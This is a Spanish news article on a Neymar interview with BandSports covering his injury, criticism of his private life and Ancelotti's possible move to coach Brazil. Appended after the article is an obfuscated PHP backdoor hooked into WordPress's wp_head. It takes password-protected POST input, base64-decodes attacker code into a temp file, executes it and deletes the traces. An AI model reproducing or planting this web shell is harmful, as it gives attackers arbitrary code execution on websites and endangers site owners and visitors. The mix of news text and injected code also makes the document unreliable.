Neymar: “Hago lo que quiero…”

El jugador del PSG concedió una entrevista a BandSports en la que repasó la actualidad, su vida y también se pronunció respecto al futuro entrenador de Brasil.

Con un futuro en el aire en París, a la espera de ver los planes de Luis Enrique con el PSG, Neymar decidió conceder una entrevista al canal BandSports en la que repasó la actualidad y también se pronunció respecto a los rumores que sitúan a Carlo Ancelotti en la selección brasileña. El mediapunta, de 31 años, comenzó hablando de su operación en el tobillo que le mantuvo fuera de los terrenos de juego varios meses. “Es horrible no jugar partidos y estar lesionado. Me gusta mucho jugar, estar en el campo. Ya es bastante duro no poder jugar un partido. Pero ¡imagínate cuando estás fuera 4-5 meses! Es terrible. Lo echo de menos. Nací para esto, para jugar al fútbol”, dijo.

Neymar, al que el PSG quiere vender en el mercado estival, aunque la llegada de Luis Enrique podría frenar su salida, tuvo palabras para las críticas y la presión a la que se somete. “Nunca he eludido mis responsabilidades. Más bien al contrario. Siempre me doy golpes en el pecho y digo “adelante, puedes golpearme otra vez”. Conozco mi talento, sé de lo que soy capaz. El fútbol no es un deporte individual. Si lo fuera, ya habría alcanzado todos mis objetivos, pero no es el caso. En cuanto a las críticas fuera del campo, a veces no estoy de acuerdo porque afectan a mi vida personal y hago lo que quiero”, aseveró.

El exjugador del Barcelona está al corriente de los planes de la selección brasileña, que quiere contratar a Carlo Ancelotti como entrenador, una noticia confirmada por el propio jugador a BandSports. “Sé que es la prioridad de la selección, el presidente quiere contar con él y los jugadores también lo queremos. Para mí, para Vini, para Militão… Ya lo conocemos, sabemos lo grande que es. Tenerlo en el equipo será muy importante. Pero todavía no hay nada confirmado. Esperamos que al final de su contrato se una a la selección”. Finalmente, Neymar acabó la entrevista aseverando que “le encantaría retirarse en Santos”.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}